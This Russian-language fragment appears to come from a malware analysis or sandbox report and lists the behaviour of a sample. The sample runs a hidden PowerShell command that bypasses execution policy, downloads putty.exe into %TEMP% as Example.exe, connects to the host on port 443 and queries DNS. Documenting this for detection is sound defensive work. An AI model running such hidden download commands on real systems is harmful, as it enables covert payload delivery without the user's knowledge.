Техническая информация
- https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe как %temp%\example.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe','%TEMP%\Example.e...
- 'th#.#arth.li':443
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe','%TEMP%\Example.e...' (со скрытым окном)